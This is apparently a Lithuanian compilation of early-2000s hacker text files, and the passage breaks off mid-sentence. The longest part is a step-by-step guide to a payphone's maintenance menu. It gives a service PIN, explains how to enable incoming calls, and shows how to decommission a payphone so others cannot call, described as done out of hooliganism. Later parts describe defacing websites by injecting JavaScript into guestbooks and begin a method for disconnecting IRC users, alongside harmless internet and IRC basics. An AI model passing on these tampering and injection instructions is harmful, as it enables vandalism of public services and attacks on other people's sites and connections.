Taigi…I meniu ieinama ivedus PIN koda , kurio uzklausimas pasirodo taksofonoLCD monitoriuje *stipriai* pakelus apatini-kairiji taksofono kampa.Ishtikruju jis turi pasiridyti atidarius taksofona specialiuoju raktu,bet pakelus taksofono kampa mes emuliuojame jo atidaryma.

[PIN CODE ? : ][ ]

Pin kodas yra keturiu skaitmenu ir dabar visoje Lietuvoje galiojantis pinkodas yra 3707.Noredami ieiti i meniu surenkame:

{3707}

Ivedant pin koda, skaicziu ekrane nesimato, juos atstoja simbolis ‘*’:

[PIN CODE ? : *** ][ ]

Ivedus pin koda, ekrane pasirodo pirmoji meniu opcija (opcija – meniu punktas):

[SETTINGS ][ ]

Taksofono meniu yra valdomas taksofono mygtuku pagalba.Mygtuku reikshmes:

<- 7 (i kaire: parodo sekanczia einamojo meniu opcija)-> 9 (i desine: parodo priesh tai esanczia einamojo meniu opcija)8 (iseiti is submeniu i aukstesnio lygio meniu)0 (ieiti i submeniu arba keisti reiksme)* (BACKSPACE funkcija – ishtrina paskutini ivesta skaitmeni)# (ENTER funkcija – patvirtina pasirinktus ar ivestus duomenis )

Meniu strukturaMeniu susideda ish opciju, kurias pasirinkus ieinama i kitus submeniu(gylesnio lygio meniu), parodoma tam tikra informacija arba atliekamostam tikros operacijos.

Pagrindinis meniuPagrindinis meniu turi 6 opcijas, kurios pasirenkamos klavishais {7} arba {9}Sekanti opcija pasirenkama klavishu {9}, priesh tai buvusi – {7}.Pagrindinio meniu opcijos:

[SETTINGS ] [ ]parametru meniu

[COMMISSIONING ][ ]prijungimo prie tinklo meniu

[DECOMMISSIONING ][ ]atjungimo nuo tinklo meniu

[MAINTENANCE ][ ]informacija ir testavimas

[CHANGE BATTERY ][ ]bateriju keitimas

[SOFT INFOS ][ ]skambucziu statistika

I kiekviena opcija ieinama paspaudus klavisha {0}, o isheinama i aukshtesnio lygio meniu (shiuo atveju – pagrindini meniu) paspaudus klavisha {8}

1. Opcija SETTINGS (parametru meniu)Iejus i shia opcija {0} galima matyti ir keisti kai kuriuos taksofonoparametrus. Virshutineje eiluteje rodomas parametro pavadinimas, oapatineje – einamoji parametro reikshme, kuria galima keisti. Parametraipasirenkami klavishais {9} arba {7}. Parametru reikshmes keicziamos taip pat klavishu {0}

Parametrai:

1.1 DIAL MODE parametras – nustato numerio rinkimo buda ir gali buti:

[DIAL MODE : ][LDD (PULSE) ]pulsinis rinkimasarba

[DIAL MODE : ][MFD (DTMF) ]toninis rinkimas

1.2 CHARGING MODE parametras – nustato pokalbio apmokestinimo buda ir galibuti:

[CHARGING MODE : ][TARIF TABLE ]pagal tarifu lentelearba

[CHARGING MODE : ][METER PULSES ]skaicziuojant pulsus

1.3 CALL START CRITERIA parametras – nustato pokalbio pradzhios pozhymi irgali buti:

[CALL START CRITERIA:][POLARITY REVERSAL ]poliarishkumo pasikeitimasarba

[CALL START CRITERIA:][METER PULSES ]skaicziuojant pulsus

1.4 INCOMING CALLS parametras – nustato ar leisti ieinanczius skambucziusir gali buti:

[INCOMING CALLS ][ALLOWED ]i taksofona paskambunti galimaarba

[INCOMING CALLS ][NOT ALLOWED ]i taksofona paskambinti negalima.

1.5 DEFAULT LANGUAGE parametras – nustato pagrindine taksofono tarnybiniupraneshimu kalba ir gali buti:

[DEFAULT LANGUAGE : ][LITHUANIAN ] lietuviuarba

[DEFAULT LANGUAGE : ][ENGLISH ]anglu

Nepaisant shio parametro, pats meniu visada bus rodomas anglu kalba.

1.6 LINE CURRENT parametras:

[LINE CURENT : 37mA ] – tel. linijos sroves stiprumas mikroamperais[BATTERY TO PLUG: YES] – parodo, ar galimas maitinimas nuo bateriju

Shio parametro negalima keisti ir jis yra informacinio pobudzhio

1.7 – 1.10 Garso parametrai decibelais:

1.7[MICRO GAIN DELTA : ] – mikrofono[ 0 dB ]

1.8[DTMF GAIN DELTA : ] – toninio rinkimo[ 0 dB ]

1.9[MODEM GAIN DELTA : ] – modemo[ 0 dB ]

1.10[EARPHONE GAIN DELTA:] – ausines[ 0 dB ]

Shiuos parametrus galima keisti klavishais {NEXT CALL} – padidinti ir{NEXT CARD} – sumazhinti.NEXT CALL klavishas – treczias ish virshaus kaireje eilejeNEXT CARD klavishas – apatinis kaireje eileje

2.Opcija COMMISSIONING – taksofono ijungimo i tinkla parametrai:

2.1.PAYPHONE ID parametras – numeris, kuriuo shis taksofonas figuruojatinkle.

[PAYPHONE ID : ][27320914 # ]

Kauno apskrityje shis numeris yra ir taksofono telefono numeris:27 – Kauno kodas, 320914 – numerisVilniuje taksofono numeracija kiek kitokia

2.2.REMAS PHONE NUMBER parametras – stoties, kuri aptarnauja shitaksofonu tinkla telefono numeris. Juo taksofonas susisiekia su stotimivykdant ijungimo i tinkla ar ishjungimo ish tinklo funkcijas

[REMAS PHONE NUMBER:][360660 ]

Shiaip paskambinus shiuo numeriu ishgirsite modemo tona.

2.3.COMMISSIONING meniu punktas vykdo taksofono ijungimo i tinklafunkcija

[COMMISSIONING (#) ][ ]

Funkcijos ivykdymui reikia paspausti {#}. Ekrane pasirodo uzhrashas

[COMMISSIONING ][IN PROGRESS… ]

ir ragelyje girdisi kaip taksofonas renka REMAS numeri ir paskuimodemas perduoda informacija

3.Opcija DECOMMISSIONING – taksofono ishjungimas ish tinklo. Iejus i jamatome tik viena meniu punkta:

3.1. DECOMMISSIONING meniu punktas – vykdo taksofono ishjungimo ish tinklofunkcija

[DECOMMISSIONING(#)][ ]

Funkcijos ivykdymui reikia paspausti {#}. Funkcija veikia analogishkaiCOMMISSIONING funkcijai, tik informacijos perdavimas vyksta trumpiau.

4.Opcija MAINTENANCE – informacija ir testavimas

Punktai:4.1.SOFTWARE RELEASEVXX.XX # (02.07)4.2.PARAMETERSVXX.XX # (00.01)4.3.CARDS ACCEPTANCEVXX.XX # (01.11)4.4.CALL CATEGORIESVXX.XX # (01.36)4.5.TT INT. NUMBERSVXX.XX # (01.36)4.6.TT NAT. NUMBERSVXX.XX # (01.36)4.7.TT DAYSVXX.XX # (01.36)4.8.TT SCHEDULESVXX.XX # (01.36)4.9.TT TARIFFSVXX.XX # (01.36)4.10.TT MEANS OF PAYMENTVXX.XX # (00.00)

Parodo taksofono programines irangos versiju numerius. Shiu parametru ish klaviaturos pakeisti negalima.

4.11.DATE/TIME punktas – parodo einanczia data ir laika:

[DATE : 99/05/31 ] – data[TIME : 09:11:23 ] – laikas

4.12.- 4.20 punktai – Taksofono testai

4.12<-[? ? ? ? ? ? ? ? ? ? ][ ? ? ? ? ? ? ? ? ? ?]LCD ekrano testas4.13->[ ? ? ? ? ? ? ? ? ? ?][? ? ? ? ? ? ? ? ? ? ]

4.14 Ragelio testas – Taksofonas patikrina ragelio veikima.

4.15 Mygtuku testas

[PUSH KEY 1 ] Analogishkai patikrinami visi mygtukai[ ]

po kurio pasirodo uzhrashas

[PAYPHONE COMPARTMENT][ACCESS(39) ]

4.16 Korteles testas

[INSERT A CHIP CARD ][THEN PRESS # ]

Ikishus kortele ir paspaudus {#} pamatome uzhtasha

[DEBIT ONE UNIT (#) ][ ]

Dabar paspaudus {#} taksofonas nuims nuo korteles viena kredita

4.17. Kalibravimas.

[INSERT A CHIP CARD ][START CALIBRATION(#)]

Idejus kortele ir paspaudus {#} taksofonas atlieka kalibravima

4.18. ANTIWIRING’o testas , reikalinga “WIRE” kortele.

[INSERT A WIRE CARD ][TEST ANTIWIRING (#)]

Paspaudus {#} taksofonas atlieka testa.

4.18. Slotu Testas – patikrina lizdus ishpletimo blokamsTestas atliekamas automatishkai:

[SMTEST ][IN PROGRESS… ]

o atlikus testa pasirodo rezultatai:

[SLOT1 : SM 6506 ] – pirmame lizde modulis 6506[SLOT2 : BAD SM ] – antras lizdas tushczias

4.19. Ryshio su telefono stotimi patikrinimas:

[REMAS CONNECTION ][ ]

Paspaudus {#} taksofonas renka REMAS numeri ir ragelije girdimi modemo garsai

[CONNECTION ][IN PROGRESS… ]

sekmingai atlikus shi testa pasirodo uzhrashas

[SUCCESFUL TRANSMIS.][ ]

5. Opcija BATTERY CHANGE – skirta bateriju pakeitimui ir turi tik viena punkta:

[CHANGE THE BATTERY ][THEN PRESS # ]

6.Opcija SOFT INFOS – skambucziu statistika.Siame skyriuje issaugoma 30 (00-29) is taksofono rinktu numeriu.Kartu issaugojama data ir laikas. Pvz:

[(00) 0 X 02000002 ][ 05/15 17:58 ]

Turekite omeny, kad telefono numeriai saugomi ne deshimtainiu formatu,o greicziausia sheshioliktainiu, tixliai nezhinau, neturejau laikonagrineti, kol rashiau shi trumpa failiuka, tad jums teks patiems tai ishsiaishkinti 🙂

Ishejimui ish meniu reikia isheiti ish submeniu i pagrendini meniu klavisho{8} pagalba, pagrindiniame meniu taip pat paspausti {8} ir pasirodzhiusuzhklausimui, ar jus tikrai norite isheiti,

[EXIT FROM THE ][LOCAL MAINTENANCE? ]

patvirtinti savo pasirinkima klavishu {#}.Pasirodzhius praneshimui

[HANG UP, CLOSE THE ][DOOR AND REMOVE CARD]

padeti rageli.

O dabar, kaip tuo pasinaudoti praktishkai?

Pvz.1: Jus stovite Kaune, Laisves alejoje ir jums zhutbut reikia aptarti vienareikala su draugeliu, kuris dabar yra namuose, jusu mobiliako akumasnusedes, o taksofono korteleje liko tik vienas kreditas…Isheitis – tegul jusu draugelis perskambina jums i taksofona.Bet Laisves alejoje nei ant vieno taksofono nera uzhrashytas jo numeris,o dauguma Kauno taksofonu neleidzhia i juos paskambinti… Taigi, jus einate prie artimiausio taksofono. Jums reikia suzhinoti jo numeri ir atblokuoti ieinancziojo ryshi funkcija:

1.) Pakeliate kairiji taksofono kampa ir matote pin kodo uzhklausima

[PIN CODE ? : ][ ]

2.) Ivedate pin koda: {3707} ir matote pirmaja opcija:

[SETTINGS ][ ]

3.) Ieinate i submeniu paspaudus klavisha {0} ir matote submeniu punkta:

[DIAL MODE : ][MFD (DTMF) ] – czia gali buti ir PULSE uzhrashas

4.) “Prasukate” meniu su klavishu {9} per 3 punktus (spaudzhiate ji 3 kartus)kol ekrane pasirodys meniu punktas

[INCOMING CALLS ][NOT ALLOWED ]

5.) Pakeicziate shi parametra paspaude klavisha {0} ir matote:

[INCOMING CALLS ][ALLOWED ]

Dabar i shi taksofona galima paskambinti. Jeigu parametras ALLOWED jau buvo nustatytas jums iejus i shi meniu punkta, vadinasi jumspasiseke ir nieko czia keisti nereikia . Abiem atvejais, isheiname i pagrindini meniu klavishu {8} ir vel matome opcija

[SETTINGS ][ ]

6.) “Prasukate” pagrindini meniu su klavishu {9} viena karta, kol ekranepasirodo opcija

[COMMISSIONING ][ ]

Ieinate i ja su klavishu {0} ir ishkart matote parametra

[PAYPHONE ID : ][27320914 # ]

Taigi, czia ir yra taksofono telefono numeris, kur 27 – Kauno kodas,o 320914 – numeris.

7.) Isheinate i pagrindini meniu paspaude {8}, vel spaudzhiate {8}.ir pasirodzhius uzhklausimui, ar jus tikrai norite isheiti,

[EXIT FROM THE ][LOCAL MAINTENANCE? ]

patvirtinkite savo pasirinkima klavishu {#}.Pasirodzhius praneshimui

[HANG UP, CLOSE THE ][DOOR AND REMOVE CARD]

padekite rageli. Dabar su jusu vieninteliu kreditu skambinate savo draugeliui ir prashote, kad perskambintu telefonu, kuri jus matete ekrane(musu pavizdyje – 320914, arba jeigu jusu draugelis yra kitame mieste – 8-27-320914) ir padeje rageli laukiate skambuczio. Suskambejus taksofonui,pakeliate rageli ir kalbates 🙂 Jusu pokalbio metu ekranas atrodys taip:

[IEINANTIS RYSYS ][ ]

o jusu draugeliui uzh pokalbi teks moketi tiek pat, kiek skambinant iprastu telefono numeriu.

Pvz.2:Jums ish chuliganishku ar kitokiu paskatu reikia, kad niekas ishskirus jusnegaletu paskambinti ish tam tikro taksofono :). Jums tereikia atjugti shitaksofona nuo tinklo (kitais zhodzhiais – uzhblokuoti ji):

1.) Ieinate i taksofono meniu kaip nurodyta pirmame pavizdyje ir ishsirenkateopcija

[DECOMMISSIONING ][ ]

2.) Ieinate i ja su klavishu {0} ir pamate

[DECOMMISSIONING (#)][ ]

Spaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeri irmodemu perduoda informacija. Tuo metu ekrane matote

[DECOMMISSIONING ][IN PROGRESS… ]

Kai taksofonas baigia informacijos perdavima, ekrane pasirodo:

[DECOMMISSIONING ][OK ]

3.) Dabar jus galite isheiti ish meniu kaip nurodyta pirmame pavizdyje irpadeti rageli. Po to, kai jus atjungete taksofona nuo tinklo, bet kas,norintis paskambinti ish shio taksofono matys ekrane uzhrasha

[TIK SPEC. TARNYBU ][NUMERIAI ]

ir negales paskambinit jokiu numeriu ishskirus 01, 02, 03, 04 🙂

Noredami patys paskambinti, jus turesite vel ijungti shi taksofona i tinkla:

1.) Ieinate i taksofono meniu ir pasirenkate opcija

[COMMISSIONING ][ ]

2.) Ieinate i ja klavishu {0} , prasukate meniu su {9} kol ekrane pasirodyspunktas

[COMMISSIONING (#) ][ ]

ir paspaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeriir modemu perduoda informacija. Tuo metu ekrane matote:

[COMMISSIONING ][IN PROGRESS… ]

Informacijos perdavimas gali uzhtrukti keleta minicziu, o kai baigiasi,ekrane matome

[COMMISSIONING ][OK ]

Taksofonas ijungtas i tinkla 🙂

Jeigu kazhkas netvarkoj (pvz. klaidingai nustatyti taksofono parametrai)arba informacijos perdavimas nepavyko, pasirodo uzhrashas

[COMMISSIONING ][NOT OK ]

Tada nustatykite tinkamus parametrus ir bandykite dar karta.

3.) Sekmingai atlike prijungimo funkcija, isheikite ish meniu kaip nurodytapirmame pvz. ir padekite rageli. Dabar galite skambinti.

Na ir dar vienas patarimas priesh pabaiga – butu nebloga ideja, prieshzhaidzhiant su taksofono meniu, nusirashyti, kaip buvo nustatyti visikintami parametrai, kad prireikus juos butu galima atstatyti. Mes juknenorime, kad mieste neliktu nei vieno veikianczio taksofono 🙂

PABAIGOS ZHODIS: Prie viso to reiktu pazhymeti, kad ash asmenishkai nesutelefonistas o czia pateikta informacija gauta praktiniu bandymu budu, todel gali pasitaikyti netikslumu ar neaishkumu.Jeigu jus turite kokiu nors pastebejimu ar galite pridurti ka nors daugiau,jusu komentarai ir pasiulymai visada laukiami. Su manimi galite susisiektiadresu: ww0lf@pogrindis.net

Knowledge is power! ww0lf

-Pabaiga-eof

17. Ouestbook hack

Puslapio hakinimas per guestbook’a Shtai dar vienas budas nuhakinti web puslapius! Taip buvo nuhakintas ir jaunimas.net ir daug kitu… Kai kurie rimtesni saitai turi apsauga nuo to bet daugumas tiesiog palieka likimo valiai! Tai va zhodziu viska ka tau reikia padaryti tai nueiti i ta puslapi su guest book’u ir parashyti vietoje tavo : “Sveiki man labai patiko jusu puslapis ir t.t.” 🙂 turiu omeni atsilepimu skiltie ar panashiai rashai tiesiog JavaScripta ir nieko daugiau > gali padaryti nuoroda i puslapi ir pan. Tai va zhodzhiu veikimo prinsipas yra toks kad kai irashai guestbooko teksta jis tiesiogiai ji irasho i savo html > nu jei html tai html tu jam duodi Java scripta ir viskas :))) Shtai keli java scripto pavyzdzhiai: Shi funkcija ishmes langeli su OK knopke kurioje bus tekstas : “HAc|{eD By Craft[Eye]” O shis paklaus ar tau 18 metu ir nuves i tam tikra puslapi 🙂 Na tai tiek 🙂 Kaip ash visada sakau Happy Hacking! Craft[Eye] – CraftEye@gmx.net

18. Hackeriai prieš crackerius

Kas yra hackeris?Hackeris- jis turi išmanyti kompiuteryje.Turi mokėti programuoti,nes be programavimo nelabai ką ir pahakinsTuri mokėti kalbas anglu ir rusu.Neskubėti,visus savo veiksmus gerai apgalvoti.Daug atiduoti pinigu už ineta :-)Niekada neturi galvoti, kad kas nors žino už jį daugiau ar mažiau, turi galvoti, kad žino mažiausiai ir reikia tobulintis.

Kuo skiriasi hackeris nuo Crackerio?

Hackeris – žmogus,kuris domisi įvairiomis operacinėmis sistemomis, jų klaidomis,dažnai programuotojas.Hackeriai dažnai sugalvoja būdus kaip įsilaužti,dažnai jie gerai išmanotechnika.Jie žino sistemos skyles ir ieško nauju.

Crackeris yra žmogus kuris daug išmanydamas apie “ineta”, ir tinklus griaunaapsaugos sistemas.Tai būdavo žmogus iššifruojantis užkoduota infa.bet dabar Crackeriai įsilaužinėja į kitus kompus,su skirtingais tikslais:Prisijunkti,sunaikinti infa, perskaityti ją, gauti passwordus ir t.tHackeriai dažnai naudojasi Crackeriu sukurtomis programomis,Kad patikrintų tinklo saugumą ir t.t

Skirtumas yra toks,kad viskas ką crackeriai daro yra nelegalu.

Crackeriai niekada neišnyks, nes juk jau tokia žmogaus prigimtis naikinti viską kas sukurta.

Skeletaz2000

19. Internet Hack

Lapkritis ‘Y2K~23:00 val.–Kadangi esu tik begineriz(o gal tik sumautaz lameriz), taj kol kas mano txt’ajinformaciniaj.. na galbut atejz lajkaz, ir me sukurpz ka norz ql… na bet kolkas tenkisnimes ir tuo… Tajp kad shis txt yra TIK informaciniz.. ajshq kajpir visi kiti :))–Hi, na taj kajp ejnasi?… oj, ne apie taj juk ash turechiau.. ajshq dabarkajp visada nuo CraftEye gausiu pzd… kad kol isivazhiuoju nesamoniu priplepuir vis apie alu varau.. ;]] oky oky.. No alko now.. jau buvo diena alko dabarne.. :)) o dabar nesimiega.. yra chrustiq ir kavoz..na taj apie ka ten mes.. otajp apie Internet’a .. hmmm… o kas taj yra… gal su uogiene taj kramtoma..Patiko chia presh kokiuz metuz kazhkokia radijos stotiz uzhdavine klausyma:“Kas yra Internetas”.. oj tada taj prisiklausiaj visokiu sapaliojimu.Apie tajkad I’netaz, taj begalo DIDELIZ ir galingas kompiuteris, arba kad tajpalydovas.. 🙂 Na manau, per metuz liaudiz jau daugiau apie taj suzhinojo.So just read… sorry, kad be lietuvybez, dar nesusikonfiguravaumandrake’o.—————————————————–Internet[pagal A.Petrovskij, B. Leontjev “Efektinvnij haking”]***Internet’az – taj didzhiausiaz kompiuteriniz tinklaz pasaulyje jungiantisbegalo daug kompiuteriu ivajriausiajz metodajz nuo telefoniniu liniju ikipalydovinio ryshio sistemu. Internet’e naudojamas protokolas TCP/IP, qrizsavyje turi”# IP(Internet protokol) – tarptinklinis protokolaz, kuris prizhiuritransliacija be jokiu papildomo tvarkymo perduodant duomenis ish vienoompiuterio kitam.# UDP(User Datagram Protocol) – vartojishkas datagram’inis protokolas,aptarnaujantis transliacija atskiru praneshimu, IP pagalba, be klaidutikrinimo.#TCP(Transmissin Control Protocol) – perdavima kontroliuojantis protokolas,aptarnaujantis transliacija IP pagalba tikrinantis susijungima.Kiekvienas kompiuteriz , prijungtas prie I’neto gauna savo IP adresa.Iternet’o adresa yra 4 bajtu dydzhio ir susideda ish dvieju daliu: tinklo irkompiuterio. Pirma dalis rejshkia logini tinkla, kuriam paskirtas adresas.Antra dalis identifikuoja konkriachiaj ta kompiuteri tinkle.Pagal susitarima, IP adresas yra ish skaijchiu ishkirtu tashkajz.pvz:196.219.31.12~~DNS~~DNS(Domain Name System) – taj duomenu base, qri lajko informacija apiekompiuteriuz,qrie yra ijungti i I’neta. Duomenu tipas priklauso nuokompiuterio, bet dazhniausiai taj IP adresas ir duomenys marshrutizacijaj.Patogumo delej, daugelis kompiuteriu turi savo vardus, pvz:Jonas, Petryte.. just jokin’ :)))DNS vykdo keleta uzhduochiu, bet pagrindine jos uzhduotis pertvarkytikompiuteriu vardus i IP ir atgal. DNS erdve atrodo kajp domenu medis,artejanchiajz prie medzhio shaknu. Medshio shaknys turi varda, po ja ejnadomenaj aukshtesnio lajpsnio(shakniez domenaj). Egzituoja dvi rushysaukshto lajpsnio domenaj. USA aukshchiausio vajzduoja arganizacijos struktura.Ir kajp tajsykle turi triju rajdzhiu varduz:# .gov – valdzhios istajgoz# .mil – karines istajgoz# .com – komercines organizacijos# .net – tinklo paslaugu tiekejaj# .org – Ne pelno siekenchios organizacijos# .edu – moxlo istajgozDel domenu uzh USA ribu susijusiu su teritorijos pasiskirstimu naudojami vardajish dvieju rajdzhiu. pvz:hakeriai.voras.lt – Lietuvoje(kazhi apie ka chia?:)www.porno.ru – Rusija (geraz sajtaz beje 🙂

~~~Darbaz I’nete~~~Na ajshq jej turi I’net’a taj ir gali kazhka jame daryti, tam yra rejkalingosprogramoz, shtaj keletaz ish ju:# ping – lejdzhia nustatyti lajka paketo nuejimo iki hosto. [kazhqr girdejaukad ne vien tam pinginimaz yra naudojamz :]# traceroute – parodo praejnanchiu paketu kelia kelia tinkle(Sux95 ir SuxNT –tracert.exe)# nslookup – lejdzhia perzhiureti DNS serveriu palajkima# telnet – Nustato sujusijungima su nutolusiu kompiuteriu(23 portas) irlejdzhia dirbti nutolusio terminalo rezhime# ftp – lejdzhia kejstis fajlajz naudojant FTP(File Transfer Protocol)protokola(21 portas)# finger – parodo informacija apie vartotojus dirbanchius tinkle.Darbuj su WWW(World Wide Web) naudojamos programos Netscape Navigator vsInternet Explorer, etc. Shioz programoz jungiasi su serveriu(80 portas) irdirba su protokolu HTTP.————————————————Na ka ir viskaz.. shiaj nakchiaj tiek… dabar tex sustot su txt. linux’u irviskuo kitu :((( Ne ne ne vyrukaj su juodajz drabuzhiajz beldzhiasi i duriz,bet arteja, ne ne ir ne apokalipse… o sumauta sesija… ech… na o po topalajma – 4T0$T0G0Z.. what’z ql.. .bu lajko viskam, i think so..————————————————Shi txt galima lajsvaj platinti, bet NIEKO nekejsti.Kadangi tikraj nemanau, kad shis txt yra idealuz, taj laukiu patajsymu irklajdu tajsymu, bej pasiulymu y-majl: j-azz@centras.lt================================================================J-azz#Ne, ash – ne hackeriz, tiesiog blogai miegojau…#

20. Keletas irc pamokėlių

ノヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘサ コ … keletas IRC pamokeliu by mr2 … コ ネヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘシ

“Communications without intelligence is noise; Intelligence without communications is irrelevant.”

ノトトトトトトトトトトトトトトトトトサ ウ <<< turinys >>> ウ ネトトトトトトトトトトトトトトトトトシ

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ ウ [[1]] tau uzdejo bana … o tau nors verk reikia ウ ウ patekt i ta kanala 😉 ウ ウ [[2]] hmm … neturiu jokio *IRC (nej mIRC … ウ ウ nej pIRC … zodziu jokio) o tajp nera laiko ウ ウ ji parsisiust ir tajp reikia pasikalbet ;((( ウ ウ [[3]] kaip pasidaryti savo script ? (trumpai) ウ ウ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ウ ウ atjungiam chiuwaka ? (ir kajp nuo to paciam ウ ウ apsisaugot) ウ ウ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ウ タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

ノトトトトトトトトトトトトトトトトトサ ウ <<< textas >>> ウ ネトトトトトトトトトトトトトトトトトシ

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ ウ [[1]] tau uzdejo bana … o tau nors verk reikia ウ ウ patekt i ta kanala 😉 ウ タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

reikalas tame kad kartais (shiaip apie 30% atveju (gal biski daugiau … gal maziau)) jei jums kokiame taj kanle uzdejo bana … norint patekt i ta kanla uztenka :

1) pasikeist nick’a arba … 2) Options/Connect/Identd/ … User ID: langelyje pakeist UserId duomenis … (kad suveiktu reikia diskonektintis ir vel konektintis) jei nepavyko lieka trechias (tikraj nepaskutinis) … 3) (sis galima sakyt ish 2-ju daliu susidarantis punktas priklauso dazniausiaj nuo to ka jus prisidirbot tame kanale) reiskias parasot “/names [#kanalo pavadinimas]” paziurit nick’us su op’ais (priesajs nick’a @ pvz : @agurkaz) ir paprasot jo nuimt bana … pvz : “/msg agurkaz plz nuimk bana [#kanalo_pav] kanale arba “/notice [#kanalas] nuimkit bana or smth” (shiuo atveju zhinute gaus visi esantys kanale) o kitas varijantas : jei kanalas kuriame gavot +b sedi nedidelis skaicius zmoniu … taj paprastaj nepraeina neij pora minuciu kaip nuimamas banas … nes tokiuose kanaluose paprasciausiai reikalinga liaudis kad ir kokia ji bebutu … tam kad ten sedetu (rkp belaukian ar dar del kokiunors kitu priezasciu) … 😉 (beabejo galima pasinaudoti proxi servu paslaugom … bet apie taj chia nerashysiu (ir tajp jau daug kas yra prirase apie proxius …))

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ ウ [[2]] hmm … neturiu jokio *IRC (nej mIRC … ウ ウ nej pIRC … zodziu jokio) o tajp nera laiko ウ ウ ji parsisiust ir tajp reikia pasikalbet ;((( ウ タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

kagi tokiu atveju daryt ? ogi tu kaijp speju sedi prie windozes ? 😉 taj kokios problemos ? spaudi start/run (arba win_klavisa+r) ir i langeli irashaj “telnet” be ->”<- … (reiketu nueit i terminal/preferences ir nusistatyt telnet’a … bet shikart ne apie taj … padarysit taj ir be mano pagalbos) tajgi pagrindiniam lange spaudi connect/remote system … ir chia pvz :

host name : irc.omnitel.net port : 6667 term type : vt100

spaudi connect … ir lauki kol pagrindiniam lange vietoj “(none)” musu atveju pamatysi : “irc.omnitel.net” … tada rasaj “user a a a a” butinaj 4-ri (dabar neaiskinsiu kas taj) [enter] tada rashaij “nick [jusu nick’as]” [enter] … tada laukiat kol servas ishmes “ping [ir chia kaskox skaicius]” … toliau rasai “pong [chia rasaij ta skaiciu kuri gavaj ish servo]” … ir jus jau prisijunge 😉 … toliau galit rasyt jau iprastas komandas kaip “join #mr2” (taip … taip … chia komandos rasomos be “/”) … tiesa jus susidursit su viena problemele : chia norink kaska pasakyt pvz : i kanala #mr2 reikia rasyt “privmsg #mr2 [jusu zinute]” (patarciau parasyt “help” [enter] ir paziuret visas komandas … nes kajp jau supratot nevisos komandos tokios pacios kajp pvz: mIRC’e … (zodziu kas iesko … tas randa) na o sedintiems po *NIX sistema manau nebus sunku padaryti tapati 😉

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ ウ [[3]] kaip pasidaryti savo script ? (trumpai) ウ タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

taip taip taip … patikekit manim yra zymiai maloniau tureti savo paties parasyta script (kaj zinaj smulkiausias jo ipatybes) nej pasikliauti gana daznaj backdorus turinchiais skriptajs … (shiaip man neteko su tokiu script turet reikalu … bet ju yra …) tiesiog parsisiuskit ircintro.hlp bei mirc.hlp … (shie helpaj paprastaj buna kartu su pachiu mIRC’u) na dar galite parsisiust numeric.hlp … kurio praktiskaj neprireiks pradedanchiam skript-kiddie … taj pradziai … toliau kaij suprasit pagrindus patarciau parsisiusti keleta jau padarytu skriptu … addon’u pvz : ish www.mircscripts.com … www.mircx.com … ir dar dauk panasiu saijtu … neslepsiu kad didele dali agurkaz-script parasiau zvilkteledamas i kitu skriptus … pvz : “warmaster” (savo laiku pac geriausias … nors jau pasenes yra daug zmoniu visdar ji naudojanciu) … tiesa i savo script neidejau ji ishgarsinusio TAKEOVER … shiaip del kurio yra teke matyt autobana gaunanciu chiuvaku bandanciu uzeijt i viena ar kita kanala … (vien delto kad naudoja warmaster’i) … ir begale kitu naujesniu ir netgi senesniu (juose kartajs net lengviau susigaudyt nej naujuosiuose …) skriptu kaip “matrix” “stigmata” ir t.t. (tiesa nepatariu siustis didelia apimti uzimanciu skriptu nes juose paprastaj be *.waw *.mp3 failiuku nieko gero ir nera … (atejtyje galbut parasysiu ir detalesni script’u darymo tutorial’a (na jej bus norinciu))

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ ウ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ウ ウ atjungiam chiuwaka ? (ir kajp nuo to paciam ウ ウ apsisaugot) ウ タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

shiaip tokiaijs dalykajs nepatariu uzsiiminet … taj yra lameriska … bet kartais buna tokiu atveju kaj buna px ant wisko ir tiesiog norisi pamokyt chiuwaka … tokiu atveju pirma ka reikia padaryti priesh karo veiksmus taj ishsiaiskint ant kiek tas chiuvax kietas … darom “/ctcp [chiuvako nick] version” ir laukiam atsakymo … tajgi gavom atsakyma pvz : mirc v5.81 (kuo senesne tuo geriau ) ir viskas nereiketu rautis ant tu pas kuriuos gaunat atsakyma BichX v.(nesvarbu kokia) ar kaska kas susije su UNIX (linux … openbsd … ir t.t. nes greiciausiaj nieko neisheis 😉 … taipogi nepatarciau prasideti su chiuwakajs ish kuriu gavot pvz : mirc v.(nesvabu) ir dar gavot kokianors skripto reklama pvz : [ agurkaz-script by mr2 ] [ http://mr2lt.cjb.net ] (chia mano skripto varijantas) … nes papraschiausiai vilties pamokyt toki chiuwaka mazaij … (nors shiaip … manes karta paprase kad ishmeginchiau jo script (dabar tixliaj nepamenu koki script) … ir jis luzho zymiaj greiciau nej zmogus be script … o shiaip atjungsi chiuwaka nuo servo ar ne dar labaj priklauso nuo tavo ineto beij jo ineto rysio … tajgi ishiaiskine chiuwako “kietumo lygi” 😉 ir nusprende ji issabacint ish servo … pvz : 